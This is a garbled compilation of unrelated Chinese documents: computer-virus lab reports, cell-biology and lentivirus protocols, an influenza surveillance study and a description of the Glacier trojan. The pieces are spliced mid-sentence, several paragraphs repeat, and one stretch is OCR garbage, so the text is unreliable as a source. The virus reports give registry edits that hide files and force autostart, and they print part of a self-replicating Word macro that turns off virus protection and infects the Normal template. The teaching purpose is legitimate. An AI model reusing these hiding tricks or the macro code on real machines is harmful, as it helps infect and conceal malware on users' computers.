洛阳理工学院实验报告
系别计算机与信
息工程系
班级Z120551 学号Z12055139 姓名乔志清
课程名称网络安全与病毒防范实验日期2014.11.06
实验名称病毒触发机制、隐藏机制成绩
实验目的:
通过本次实验,要求学生能够通过进程管理了解运行的进程数及通过进程发现是否有病毒运行的进程;通过修改注册表了解病毒触发机制和隐藏机制。
实验条件:
电脑一台、能上网查阅资料
实验内容与步骤:
一.实验内容:
了解认识病毒触发机制、隐藏机制
二.实验过程及结果:
1.在虚拟机XP上打开windows任务管理器(如图1所示),在以下进程中有些进
程是不能被结束。这几个进程是:
csrss.exe子系统服务器进程;
winlogon.exe管理用户登录;
services.exe包含很多系统服务;
lsass.exe管理IP安全策略以及启动ISAKMP/Oakley(IKE)和IP安全驱动程序;svchost.exe包含很多系统服务;spoolsv.exe将文件加载到内存中以便迟后打印;explorer.exe资源管理器。
其中将进程explorer.exe结束桌面无法正常显示(如图2)。结束winlogon.exe关机后会黑屏。结束spoolsv.exe、svchost.exe系统会自动关机。
图1 XP系统运行进程数
图2 结束进程explorer.exe桌面显示
图3 系统自动关机显示界面
2.病毒的触发机制(通过修改系统注册表自启)。
(1)进入虚拟机,打开注册表找到userinit.exe(如图4),将键值中最末尾“,”去掉,当电脑被病毒入侵时,如果运行这个,病毒也会运行。
图4 注册表显示userinit.exe界面
(2)在注册表中找到HKEY_CLASSES_ROOT\txtfile\shell\open\command(如图5),默
认值是%SystemRoot%\system32\NOTEPAD.EXE %1,将%1删去,在当前系统新建txt文档,输入内容保存后,再打开,不显示之前保存的内容。
图5 路径HKEY_CLASSES_ROOT\txtfile\...下的默认值
3 .病毒的隐藏机制(通过修改注册表)。
在注册表中查找路径:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advance d\Folder\Hidden\SHOWALL中的CheckedValue(如图6),在改动CheckedValue之前先建一文档,并设置属性为隐藏。再将CheckedValue改为CheckedValuea,再新建CheckedValue 保存(如图7)。在文件夹选项中选中“显示所有文件和文件夹”选项,点击确定,之前设置的文档不能正常显示,因为文件夹选项中的“显示所有文件和文件夹”选项不能选中,系统自动选中“不显示隐藏的文件和文件夹”。
图6 路径HKEY_LOCAL_MACHINE\...中的CheckedValue显示
图7 改动后的注册表显示
实验总结:
通过本次实验,我学会了通过进程管理了解运行的进程数及通过进程发现是否有病毒运行的进程,同时通过修改注册表了解了病毒触发机制和病毒隐藏机制。以前学了解过类似的知识但是理解的不是很透彻,通过本次试验使我更加系统和全面的掌握了这方面的知识,病毒隐藏机制这块儿了解的越多越好,这和我们的日常生活比较紧密,总之这节课学到的知识很实用。
姓名班级 13级生命基地班学号同组者: 科目细胞生物学实验实验题目动物细胞融合 【实验题目】 动物细胞融合 【实验目的】 1.了解动物细胞融合的常用方法。 2.学习化学融合的基本操作过程。 3.观察动物细胞融合过程中细胞的行为与变化。 【实验材料与用品】 1、材料 鸡血红细胞 2、试剂 50%PEG、GKN溶液、Alsever’s细胞保存液、0.85%氯化钠溶液。 3、器材 倒置显微镜、离心机、载玻片、盖玻片、离心管、废液缸、滴管等。 【实验原理】 细胞融合是指在自发或者诱导条件下,两个或两个以上细胞合并为双核或者多核细胞的过程。目前人们已经发现有很多方法可以诱导细胞融合,包括:病毒诱导融合、化学诱导融和和电激诱导融合。 1、病毒诱导融合 仙台病毒、牛痘病毒、新城鸡瘟病毒和疱疹病毒等可以介导细胞的融时也可介导细胞与细胞的融合。用紫外线灭活后,这些病毒即可诱导细胞发生融合。 2、化学诱导融合 很多化学试剂能够诱导细胞融合,如聚乙二醇(PEG)、二甲基亚砜、山梨醇、甘油、溶血性卵磷脂、磷脂酰丝氨酸等。这些物质能够改变细胞膜脂质分子的排列,在去除这些物质之后,细胞膜趋向于恢复原有的有序结构。在恢复过程中想接触的细胞由于接口处脂质双分子层的相互亲和与表面张力,细胞膜融合,胞质流通,发生融合。化学诱导方法,操作方便,诱导融合的概率比较高,效果稳定,适用于动、植物细胞,但对细胞具有一定的毒性。PEG 是广泛使用的化学融合剂。 3、电激诱导融合
姓名班级 13级生命基地班学号同组者: 科目细胞生物学实验实验题目动物细胞融合 包括电诱导、激光诱导等。其中,电诱导是先使细胞在电场中极化成为偶极子,沿电力线排布成串,再利用高强度、短时程的电脉冲击破细胞膜,细胞膜的脂质分子发生重排,由于表面张力的作用,两细胞发生融合。电诱导方法具有融合过程易控制、融合概率高、无毒性、作用机制明确、可重复性高等优点。 【实验步骤】 在本次实验中采用的是化学诱导融合的方法,利用PEG使鸡血红细胞发生融合。具体实验步骤如下: 1、取鸡血2ml+2mlAlsever液,再加入6mlAlsever液,混匀后制悬液(4℃保存)【老师已做好,可直接使用】 2、取(1)中悬液1ml+4ml的0.85%的NaCl溶液,进行以下三次离心处理: ①在1200r/min下离心5min,去掉上清液,再加入0.85%的NaCl溶液至5ml; ②1000-1200r/min下离心5min,去掉上清液,再加入0.85%的NaCl溶液至5ml; ③1000-1200r/min下离心7min 【因时间关系此次实验只离心一次】 3、将离心后的沉降血球(去上清后约0.1-0.2ml)加入GKN至1-2ml,使之成为10%的细胞悬液; 4、取上述10%的血球悬液1ml,加入3mlGKN液,使每毫升含血球15000000个; 5、分别取(4)1ml+0.5ml50%PEG,(4)0.5ml+0.5ml50%PEG,(4)0.5ml+1.0ml50%PEG,混匀滴片,编号分别为①②③号溶液。在常温下2-3min后,显微镜下观察。 【实验结果】 1、实验中可观察到两个和多个细胞发生质膜融合现象,可看到不同融合状态的细胞: ①两细胞的细胞膜相互接触、粘连; ②接触部分的细胞膜崩解,两细胞的细胞质相同,形成一个细胞质的通道,呈现哑铃状; ③通道扩大,两个细胞连成一体,呈现一个长椭圆形细胞; ④细胞融合完成形成含有双核或者多核的细胞,呈圆形。 比较典型的细胞融合时的形态如下图:
一、包装细胞293T 细胞的培养 一、293T 细胞的冻存 1. 随着传代的次数增加,293T 细胞会出现生长状态下降,出现突变等。所以要在细胞购进时就进行冻存。 2. 在细胞对数生长期进行冻存,增加细胞复苏成活率。 3. 倒去细胞上清液,加入D-Hank's 液洗去残留的培养基。 4. 加入0.25% 的胰酶,消化10-20s 后倒去。 5. 镜下观察细胞变圆,细胞间间隙加大时,加入新鲜培养基吹打混匀。 6. 细胞计数。 7. 将细胞离心,1000rpm ,2min 。 8. 根据计数结果加入细胞冻存液(70% 完全培养基+20%FBS+10% DMSO )重悬细胞,密度为3X 10 6个/ml。 10. 第二天将细胞放入液氮灌,并记录。 二、293T 细胞的传代 1. 当细胞生长至汇合率达到80~90% 需要对细胞进行传代操作,以扩大细胞数量,维持细胞良好的生长状态。 2. 消化细胞,方法同上。 3. 细胞离心结束后,加入完全培养基重悬。密度为 3 X10 5个/ml。 4. 分到10cm 培养皿中,10ml/ 皿。 三、293T 细胞的复苏 1. 当细胞传代次数过多(超过50 代),细胞状态变差时或细胞出现污染事故时,需要丢弃并对开始冻存的细胞进行复苏。 2. 打开水浴锅,设置温度为40 C。 3. 查看细胞库记录,根据记录从液氮灌中取出冻存的细胞(需戴上棉手套,防止被冻伤),迅速丢入水浴锅中并快速晃动,在1~2 min 内使细胞溶液完全溶解。 4. 将1ml 细胞溶液加入9 ml 完全培养基中并混匀后转入10cm 培养皿。 5. 放回37 C、3%CO 2和95%相对湿度的培养箱中培养。 6. 第二天观察细胞存活率。倒掉旧的培养基,加入10ml 新鲜培养基。 二、慢病毒的包装、浓缩和滴度测定 1. 所用病毒检测引物为WPRE 特异引物,序列如下 只供学习与交流
宏病毒实验报告 2 邹文敏 一、实验目的 通过运行计算机代码,更加深刻的理解计算机代码。对计算机代码有一个初步的认识。 加深对宏病毒的感性认识,宏病毒是感染数据文件word,office 等。 二、实验内容 运行自我复制,感染word公用模板和当前文档;具有一定破坏性的宏;清除宏病毒。 三、实验步骤 实验一: 将word文档中的开发者工具打开;word 中心→信任选项→宏设计将信任选项打开
运行第一个实验Visual Basic →normal →Microsoft→the document Project→microsoft word对象→the document复制如下代码:'APMP Private Sub Document_Open() On Error Resume Next Application.DisplayStatusBar = False Options.VirusProtection = False Options.SaveNormalPrompt = False '以上都是基本的自我隐藏措施 MyCode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines( 1, 20) Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModule If ThisDocument = NormalTemplate Then _ Set Host = ActiveDocument.VBProject.VBComponents(1).CodeModule
引导型病毒的机理和解析
引导型计算机病毒的机理和解析 摘要:引导型病毒是什么,其技术发展,优缺点,特点以及来源,引导型病毒的机制,解析源于DOS高级版本以及Windows 9X的新型引导型病毒的结构,并提出引导型病毒的检测和防治方法。 关键词:引导区硬盘内存新型引导型病毒病毒结构防治 计算机病毒是指在计算机程序中插入的破坏计算机功能或数据,影响计算机使用并且能够自我复制的一组计算机指令或程序代码。计算机病毒具有3个基本特性:感染性、潜伏性和表现性。换句话来说计算机病毒是人为的特制程序或指令程序,具有自我复制能力,并有一定的潜伏性、特定的触发性和很大的破坏性。 计算机病毒的种类繁多,按感染方式分为:引导型病毒、文件感染病毒和混合型病毒。引导型病毒感染硬盘主引导扇区或引导扇区以及软盘的引导扇区,如大麻、火炬、BREAK等病毒。 1 引导型病毒 1.1 简介 引导型病毒寄生在主引导区、引导区,病毒利用操作系统的引导模块放在某个固定的位置,并且控制权的转交方式是以物理位置为依
据,而不是以引导型病毒寄生在主引导区、引导区,病毒利用操作系统的引导模块放在某个固定的位置,并且控制权的转交方式是以物理位置为依据,而不是以操作系统引导区的内容为依据,因而病毒占据该物理位置即可获得控制权,而将真正的引导区内容搬家转移,待病毒程序执行后,将控制权交给真正的引导区内容,使得这个带病毒的系统看似正常运转,而病毒已隐藏在系统中并伺机传染、发作。 引导型病毒进入系统,一定要通过启动过程。在无病毒环境下使用的软盘或硬盘,即使它已感染引导区病毒,也不会进入系统并进行传染,但是,只要用感染引导区病毒的磁盘引导系统,就会使病毒程序进入内存,形成病毒环境。 1.2 计算机启动过程 在分析引导型病毒之前,必须清楚正常的系统启动过程。上电或复位后,ROM_BIOS的初始化程序完成相应的硬件诊断,并设置
引导型计算机病毒的机理和解析 摘要:引导型病毒是什么,其技术发展,优缺点,特点以及来源,引导型病毒的机制,解析源于DOS高级版本以及Windows 9X的新型引导型病毒的结构,并提出引导型病毒的检测和防治方法。 关键词:引导区硬盘内存新型引导型病毒病毒结构防治 计算机病毒是指在计算机程序中插入的破坏计算机功能或数据,影响计算机使用并且能够自我复制的一组计算机指令或程序代码。计算机病毒具有3个基本特性:感染性、潜伏性和表现性。换句话来说计算机病毒是人为的特制程序或指令程序,具有自我复制能力,并有一定的潜伏性、特定的触发性和很大的破坏性。 计算机病毒的种类繁多,按感染方式分为:引导型病毒、文件感染病毒和混合型病毒。引导型病毒感染硬盘主引导扇区或引导扇区以及软盘的引导扇区,如大麻、火炬、BREAK等病毒。 1 引导型病毒 1.1 简介 引导型病毒寄生在主引导区、引导区,病毒利用操作系统的引导模块放在某个固定的位置,并且控制权的转交方式是以物理位置为依据,而不是以引导型病毒寄生在主引导区、引导区,病毒利用操作系统的引导模块放在某个固定的位置,并且控制权的转交方式是以物理位置为依据,而不是以操作系统引导区的内容为依据,因而病毒占
据该物理位置即可获得控制权,而将真正的引导区内容搬家转移,待病毒程序执行后,将控制权交给真正的引导区内容,使得这个带病毒的系统看似正常运转,而病毒已隐藏在系统中并伺机传染、发作。 引导型病毒进入系统,一定要通过启动过程。在无病毒环境下使用的软盘或硬盘,即使它已感染引导区病毒,也不会进入系统并进行传染,但是,只要用感染引导区病毒的磁盘引导系统,就会使病毒程序进入内存,形成病毒环境。 1.2 计算机启动过程 在分析引导型病毒之前,必须清楚正常的系统启动过程。上电或复位后,ROM_BIOS的初始化程序完成相应的硬件诊断,并设置ROM_BIOS中断和参数,调用INT19H自举。注意ROM_BIOS初始化程序已设置了BIOS中断。 对于硬盘启动,自举程序将硬盘物理第1扇(主引导记录)读到内存首址为0:7C00的区域处,开始执行硬盘主引导区程序,找到激活分区,并将该分区首扇(引导区)也读到0:7C00处(自身下移),
COM病毒实验报告 我们小组已经成功的实现了COM病毒感染实验。 在整个实验过程中,由于是初次配置Dos环境,我们遇到了很多问题,也花了很多时间去解决问题,因此,我们在此写出我们整个配置过程的主要步骤及其遇到的问题。 一.配置MS-Dos 1. 新建一个虚拟机 2. 用虚拟机的软驱载入,安装程序的第一个镜像 DOS71_1.IMG (在安装时设备里面没有floppy时只需add一下就好,选择物理软盘驱动器) 3.此时MS-DOS虚拟机处于半安装状态,然后开始命令配置 先创建一个文件夹tmp md tmp 复制软盘A的文件到C copy A:\ C:\tmp 关机 shutdown -s 4.用虚拟机的软驱载入安装程序的第二个镜像 DOS71_2.IMG 复制软盘A的文件到C copy A:\ C:\tmp 5.开始配置 先进入到tmp文件夹下 运行setup.bat (在此运行过程中,出现死机,原因不明,最后通过重启解决此问题) 6. 然后一路next和ok完成配置 二.安装MASM611 1.下载MASM611(里面包括5个DISK) 2.在虚拟机里面通过映射到磁盘(我们所做实验为Z盘),在映射过程中,特别注意把只读属性去掉,然后把下载的MASM611拷贝到此磁盘 3.打开MS-DOS系统,进入到MASM611下的DISK1文件目录下 4.开始安装 运行命令 setup.exe 5.在安装过程中,特别注意在第二次选项时应选择MS-DOS/Microsoft
Windows,否则无法使用link链接命令 6.其它一律按默认值点击确定,安装成功 三.实验过程 1.在使用MASM611前,应在MASM611目录下进行路径的配置(这点要特别注意) 路径配置命令 set PATH=C:\DOS71;..;C:\MASM611\BIN; 2.编译链接test文件(test文件是正常文件),在此实验中,链接后需要把test.exe改为https://www.doczj.com/doc/571732939.html,文件 编译test文件时出错 unmatched block nesting:main(解决方法:在test 文件中加入一句与main匹配的代码main endp) 3.运行test文件(命令为https://www.doczj.com/doc/571732939.html,),运行成功,显示字符串:This a simple com program for a test 4.编译链接virus文件(virus文件为病毒),此时virus.exe文件已经生成 编译virus文件时出错 invalid character in file(解决方法:在相应的出错处加上分号;) 6.新建一个文件del.txt 命令 echo aaa >del.txt 7.查看MASM611下的文件目录,此时可以看到del.txt文件 8.运行virus.exe,成功后出现字符串 You are infected by a simple com virus,(但在运行该命令时,系统有时会死机,原因不明,最后解决方法,强制关掉MS-DOS系统后重新启动) 9.然后运行https://www.doczj.com/doc/571732939.html,,此时运行结果为 You are infected by a simple com virus 以及相关的乱码等等 10.此时在MASM611目录下查找刚刚新建的文件del.txt,可以发现del.txt不 见了,并且https://www.doczj.com/doc/571732939.html,文件变大 11.实验结束,病毒virus文件成功感染test文件
2011—2013年辽阳市流感病毒实验室检测结果分析 发表时间:2014-04-09T14:43:02.983Z 来源:《中外健康文摘》2013年第39期供稿作者:刘婧媛 [导读] 2011-2013年两年间辽阳市均有流感病毒流行,通过实验室检测得知两年的流行病毒毒株型别不同,证实了流感病毒抗原性变异的特性。 刘婧媛 (辽阳市疾病预防控制中心质量管理科辽宁辽阳 111000) 【摘要】流行性感冒病毒是引起急性呼吸道感染的重要病原,传播迅速,常会引起暴发,甚至造成世界大流行。上世纪流感病毒就引起四次世界大流行,造成相当严重的损失[1]。目的为了探究流感病毒流行和变异规律,了解其根据流感病毒核蛋白(NP),M1蛋白抗原性和基因特性的不同分为甲(A)乙(B)丙(C)三型[2],病毒具有抗原性变异的特性,提供控制流行的科学依据,对 2011—2013年度辽阳市流行性感冒的病原学监测结果进行分析。方法采集流感样病例的咽拭子标本,采用real time-PCR进行核酸检测,分别用人红细胞、狗肾细胞(MDCK)进行病毒分离,采用血凝抑制方法(HAI)进行流感病毒型别鉴定。结果 2011年4月~2012年3月共检测辽阳市流感哨点医院咽拭子标本388份,核酸检测PCR阳性13例,分离到流感病毒10株,阳性分离率为2.58%,经分型鉴定A型H3N2亚型2株(20%),B型Victoria5株(50%),B型Yamagata3株(30%),A型H1N1亚型、新H1N1未检出;2012年4月~2013年3月共检测辽阳市流感哨点医院咽拭子标本593份,核酸检测PCR 阳性40例,分离到流感病毒30株,阳性分离率为5.06%,经分型鉴定A型H1N1亚型2株(6.67%),A型H3N2亚型,15株(50%),新H1N112株(40%),B型Yamagata,1株(3.33%),B型Victoria未检出。结论:2011~2012年度流感流行季节中辽阳市有流感流行,流行的优势毒株为B型,同时有A型H3N2亚型毒株的存在;2012~2013年度流感流行季节中辽阳市有流感流行,流行的优势毒株为A型H3N2亚型和新H1N1,同时有A型H1N1亚型、B型Yamagata毒株的存在。 【中图分类号】R446 【文献标识码】A 【文章编号】1672-5085(2013)39-0179-02 1.材料和方法 1.1标本 2011年4月1日-2012年3月31日采集的辽阳市中心医院咽拭标本388份;2012年4月1日-2013年3月31日采集的辽阳市中心医院咽拭标本593份。 1.2流感病毒核酸 real time-PCR 1.2.1采用Quant One step RT-PCR kit RNA 提取试剂盒提取流感病毒样本核酸。 1.2.2QIAGEN real time (荧光定量PCR法)检测试剂盒扩增病毒核酸,反应体系见表1 组分体积(μl) 2×QuantiText Probe RT-PCR Master Mix12.5× 上游引物(40μM)0.5× 下游引物(40μM)0.5× Probe (10μM)0.5× QuantiText RT Mix0.25× Rneasy Free Water UP to 25 病毒核酸RNA 5.0× 1.2.3将上述加好的反应体系的反应管放于PCR仪进行反应,反应程序如下:见表2 步骤反应温度(℃)时间(min)是否采集荧光循环数 逆转录酶605否1 5030否1 预扩增9515否1 950.25否45 扩增及荧光收集550.5否45 720.5是45 725否1 1.2.4结果判定及标准 对照:阴性对照无CT值或CT值为零,阳性对照CT值<30。 样品:CT值≤35报告为阳性。 样品:37≤CT值≤40为灰区,需重新采样检测。 样品:无CT值或CT值为零报告为阴性。 1.3流感病毒分离 上述PCR结果为阳性的样本接种培养好的MDCK细胞生长液,观察细胞病变情况。 1.3.1将已长成单成的MDCK细胞生长液,用DPBS液洗两遍。 1.3.2每瓶接种标本0.5ml,每个标本接种1瓶,轻摇,使标本完全覆盖细胞,置35℃吸附2小时。 1.3.3倒掉感染液,用DPBS液洗两遍,每瓶加入含2μg/ml胰酶的病毒维持液10ml,35℃培养。 1.3.4次日起每天观察有无细胞病变(CPE)并记录,如病变明显细胞脱落可收获并做血凝,如未有病变,继续观察7日收获做血凝。 1.4血凝实验
慢病毒包装实验的要点: 1:良好的293FT细胞状态是转染成功的首要因素,细胞代数不宜超过30代; 2:细胞铺板需均匀,避免细胞成团,影响转染效率;尽量多的细胞转入质粒,产生的病毒就越多; 3:细胞换液和共转染时,动作要轻柔避免细胞漂浮。尽量少的细胞死亡,产生的病毒就越多; 实验前要准备的试剂、耗材和仪器; 试剂准备:10%灭活胎牛血清+90%DMEM配好的完全培养基,0.25%胰酶,PBS,TRL转染试剂,包装质粒,目的质粒,无血清培养基。 耗材准备:10cm细胞培养皿,6孔细胞培养板,吸头规格1ml、200ul、10ul,10ml移液管,离心管规格15ml、5ml、1.5ml,0.22um PVDF滤膜和10ml无菌注射器,试管架。仪器准备:倒置荧光显微镜,普通光学倒置显微镜,电动移液器,吸引器,移液枪,二级生物安全柜,二氧化碳细胞培养箱。 第一天:上午(病毒包装质粒共转染前,293FT细胞复苏后至少让其传代两次以上,293FT 细胞能成倍的增长,确定细胞状态好); 实验前准备: 安全柜开紫外灯照30分钟; 把培养基和试剂放置常温; 消化细胞: 从37 5%的co2细胞培养箱拿出细胞状态良好的293FT细胞,吸出原培养基,加入PBS 1ml略洗之后吸出,加入1ml胰酶消化1-2min,轻轻拍打培养皿,再加入3ml新鲜培养基终止消化,将培养皿中的细胞转移至15ml离心管内离心1000r /5min,吸出上清液,加入10ml PBS 吹打混匀后,离心1000r /5min, 吸出上清液。 细胞铺板: 在10cm细胞培养皿上标记细胞名称、细胞代数、时间和操作人,将计数好大约2.5×106个293FT细胞吸入15ml离心管,再加入完全培养基至10ml充分混匀,然后把混匀的293FT细胞移入10cm培养皿)。放置培养箱中培养48h。 插入铺板后图片
防病毒实验报告 姓名:王宝 学号:08103663 班级:信安10-1班 指导教师:朱长征 2013.7
实验一PE结构分析及DOS病毒感染与清除 一、实验目的 1.熟悉PE文件结构 2.掌握DOS系统下.EXE文件病毒感染与清除方法 二、实验要求 1.实验之前认真准备,编写好源程序。 2.实验中认真调试程序,对运行结果进行分析,注意程序的正确性和健壮性的验证。 3.不断积累程序的调试方法。 三、实验内容 1)手工或编程从user32.dll中获得MessageBoxA的函数地址;1、打开lordPE软件,查找user32.dll,找到如下图: 图 1
2、右击点载入到PE文件编辑器 3、点击目录,查看目录表信息 4、用软件给出的文件位置计算器就可以得到MessageBoxA的一些信息如下:
如此就可以得到MessageBoxA的VA。又因为,文件中的地址与内存中表示不同,它是用偏移量(File offset)来表示的。在SoftICE和W32Dasm下显示的地址值是内存地址(memory offset),或称之为虚拟地址(Virual Address,VA)。而十六进制工具里,如:Hiew、Hex Workshop等显示的地址就是文件地址,称之为偏移量(File offset) 或物理地址(RAW offset)。所以偏移地址就是物理地址。这样就得到了MessageBoxA的地址了。
2)查阅资料,结合第2章内容,根据PE结构编写一个小的工具软件,或者用PE Explorer、PEditor、Stud_PE等工具软件查看、分析PE 文件格式。针对PE文件格式,请思考:Win32病毒感染PE文件,须对该文件作哪些修改; PE的总体结构如下表所示: DOS MZ header部分是DOS时代遗留的产物,是PE文件的一个遗传基因,一个Win32程序如果在DOS下也是可以执行,只是提示:“This
·190·星堕墅墅盘查!!!!生篁!!鲞釜i塑!里!』曼!!丛!!至!坠:!!塑!!!!:!!:堕!:! 流感病毒的实验室检测方法及进展 李月越陈杭薇李兵 【摘要】流行性感冒(流感)是由流感病毒引起的急性呼吸道传染病,其在人群中蔓延快,且具有高发病率及致死率的特点。流感的诊断不仅要根据临床症状和体征,其确诊还有赖于实验室检查。流感病毒的检测技术大致分为4个方面,即病毒分离培养、血清学诊断、现代免疫学诊断及分子生物学诊断。现分别从以上几个方面对流感病毒实验室检测方法及进展进行综述。 【关键词】流感病毒;检测方法 Lab帅torialmethods狮dp哪哪艄0fd咖tiIlgiIIflu眦avin麟Uy访y獬,CHEN协咒g-讹i,UBi恕g.&加仃批,zfo,尺Ps加m£o删M毒d觑九8,&巧i挖gCDm凇挖d&咒8m£Hospi£nZo,PLA,&巧锄g100700,吼i御 (乃rr已s户D行矗i729口“腩or:(HE小,H口ng一议,Pi 【AbstI’act】Influenzavirusescauseanacuterespiratorydiseasethatspreadsepidemicallyinthehumanpopulation.CharacterofInfluenzaishighmorbidityandmortality.DiagnosisofinfluenzadependsonnotonlyclinicialsymptomsandsingsbutalsolaboratoriaIdetections.Viralcultureandisolation,serodiagnosis,immumolo—gicalassayandmolecularbioIogicaldiagnosisarefourmethodsthatcommonlyusededforinfluenzavirusdetection.Laboratorialmethodsandprogressesofdetectinginfluenzavirusesaresummarizedinthef01lowingtext. 【Keywords】Influenzaviruses;Detectionmethod 流行性感冒简称流感,是由流感病毒引起的急 性呼吸道传染病,传染性强,蔓延快,其抗原易变异, 对人群尤其是儿童、老年人及机体免疫力低下的人 群有较高的发病率及致死率,危害很大。流感病毒 分为甲、乙、丙三型,其中变异大的、危害重的主要是 甲型和乙型流感病毒,尤以甲型为主,常可引起较大 范围的流行[1]。 流感的诊断不仅要根据临床症状和体征,还需 要实验室检测来证实。病毒诊断技术大致分为4个 方面,即病毒分离、血清学诊断、现代免疫学诊断及 分子生物学诊断瞳]。现分别进行介绍。 l病毒分离培养 病毒分离培养是诊断流感最可靠的方法之一。 因流感病毒能够在鸡胚中良好生长,所以早期多用 鸡胚分离流感病毒,一般用9日龄至11日龄的鸡胚 通过羊膜腔或尿囊腔接种分离病毒,接种后24~96h 收集鸡胚尿囊液,24h内死亡的鸡胚弃掉,用鸡的 红细胞检测尿囊液或细胞培养液的血凝活性来证实 病毒的增殖和存在,如初次分离不到病毒,可盲传2 代再进行检测;但近年来,随着分子生物学技术的发 展,发现通过鸡胚所分离到的流感病毒,其抗原性与 原始标本有所不同,而通过马一达犬1肾细胞(MDCK) 作者单位;100700北京军区总院呼吸内科 通讯作者:陈杭薇.综述. 分离病毒的抗原性与原始标本相似,另外由于 MDcK细胞对“o”相毒株的敏感性比鸡胚高很多, 故MDCK细胞已成为流感病毒分离不可缺少的一 种宿主系统,现亦得到较为广泛的应用;MDCK分 离的病毒在很多国家尚未批准用于疫苗生产,因此 病毒分离现同时采用鸡胚及MDCK细胞两套系 统口]。但无论是以上哪种方法对标本中病毒采集、 运输及保存条件要求均较高,病毒样品如能在48h 分离,可在4℃保存,如果样品要存放较长时间必须 低温冻存(一70℃);且要求标本中的病毒含量高, 必须达到鸡胚或MDCK培养法所需要的病毒含量, 分离培养较为复杂、耗时且不稳定,也不能在普通实 验室进行,要确诊需要较长时间,故对流感早期诊断 及临床指导意义不大。 Shih等H3将一种新的实验室培养技术——离 心培养技术(shellvialculture,SVC)应用于流感病 毒的培养,其与传统培养方法没有本质的区别,不同 点为在标本接种后进行长时间的低速离心,使标本 中含病毒的颗粒在外力作用下被压挤吸附于培养细 胞,从而大大缩短了培养时间并提高了敏感性。在 国内倪安平等口]亦采用SVC技术快速诊断流感病 毒,结果显示该技术能在24h内获得流感病毒培养 结果,可以快速确诊流感患者。 郭元吉等[63建立了一种流感快速诊断方法,具 体为:采集标本经成片MDCK细胞扩增,使细胞表万方数据
目录 简介 (1) 工作原理 (1) 步骤流程 (5) 功能 (18) 清除方法 (19) 结论 (20)
简介 冰河木马开发于1999年,在设计之初,开发者的本意是编写一个功能强大的远程控制软件。但一经推出,就依靠其强大的功能成为了黑客们发动入侵的工具,并结束了国外木马一统天下的局面,成为国产木马的标志和代名词。 在2006年之前,冰河在国内一直是不可动摇的领军木马,在国内没用过冰河的人等于没用过木马,由此可见冰河木马在国内的影响力之巨大。目的:远程访问、控制。选择:可人为制造受害者和寻找"养马场",选择前者的基本上可省略扫描的步骤。 从一定程度上可以说冰河是最有名的木马了,就连刚接触电脑的用户也听说过它。虽然许多杀毒软件可以查杀它,但国内仍有几十万中冰河的电脑存在!作为木马,冰河创造了最多人使用、最多人中弹的奇迹!现在网上又出现了许多的冰河变种程序,我们这里介绍的是其标准版,掌握了如何清除标准版,再来对付变种冰河就很容易了。 冰河的服务器端程序为G-server.exe,客户端程序为G-client.exe,默认连接端口为7626。一旦运行G-server,那么该程序就会在C:/Windows/system目录下生成Kernel32.exe和sysexplr.exe,并删除自身。Kernel32.exe在系统启动时自动加载运行,sysexplr.exe和TXT文件关联。即使你删除了Kernel32.exe,但只要你打开TXT 文件,sysexplr.exe就会被激活,它将再次生成Kernel32.exe,于是冰河又回来了!这就是冰河屡删不止的原因。 工作原理 冰河木马是用C++Builder写的,为了便于大家理解,我将用相对比较简单的VB来说明它,其中涉及到一些WinSock编程和Windows API的知识,如果你不是很了解的话,请去查阅相关的资料。 一、基础篇(揭开木马的神秘面纱) 无论大家把木马看得多神秘,也无论木马能实现多么强大的功能,木马,其实质只是一个网络客户/服务程序。那么,就让我们从网络客户/服务程序的编写开始。 1.基本概念: 网络客户/服务模式的原理是一台主机提供服务(服务器),另一台主机接受服务(客户机)。作为服务器的主机一般会打开一个默认的端口并进行监听(Listen), 如果有客户机向服务器的这一端口提出连接请求(Connect Request), 服务器上的相应程序就会自动运行,来应答客户机的请求,这个程序我们称为守护进程(UNIX的术语,不过已经被移植到了MS系统上)。对于冰河,被控制端就成为一台服务器,控制端则是一台客户机, G_server.exe是守护进程, G_client是客户端应用程序。(这一点经常有人混淆,而且往往会给自己种了木马!)
慢病毒载体包装构建过程 原理:慢病毒载体可以将外源基因或外源的shRNA有效地整合到宿主染色体上,从而达到持久性表达目的序列的效果。在感染能力方面可有效地感染神经元细胞、肝细胞、心肌细胞、肿瘤细胞、内皮细胞、干细胞等多种类型的细胞,从而达到良好的的基因治疗效果。对于一些较难转染的细胞,如原代细胞、干细胞、不分化的细胞等,使用慢病毒载体,能大大提高目的基因或目的shRNA的转导效率,且目的基因或目的shRNA整合到宿主细胞基因组的几率大大增加,能够比较方便快捷地实现目的基因或目的shRNA的长期、稳定表达。 概念:慢病毒载体是指以人类免疫缺陷病毒-1 (H IV-1) 来源的一种病毒载体,慢病毒载体包含了包装、转染、稳定整合所需要的遗传信息,是慢病毒载体系统的主要组成部分。携带有外源基因的慢病毒载体在慢病毒包装质粒、细胞系的辅助下,经过病毒包装成为有感染力的病毒颗粒,通过感染细胞或活体组织,实现外源基因在细胞或活体组织中表达。 辅助成分:慢病毒载体辅助成分包括:慢病毒包装质粒和可产生病毒颗粒的细胞系。 慢病毒载体包含了包装、转染、稳定整合所需要的遗传信息。慢病毒包装质粒可提供所有的转录并包装RNA 到重组的假病毒载体所需要的所有辅助蛋白。为产生高滴度的病毒颗粒,需要利用表达载体和包装质粒同时共转染细胞,在细胞中进行病毒的包装,包装好的假病毒颗粒分泌到细胞外的培养基中,离心取得上清液后,可以直接用于宿主细胞的感染,目的基因进入到宿主细胞之后,经过反转录,整合到基因组,从而高水平的表达效应分子。 基本原理:慢病毒载体系统由两部分组成,即包装成分和载体成分。
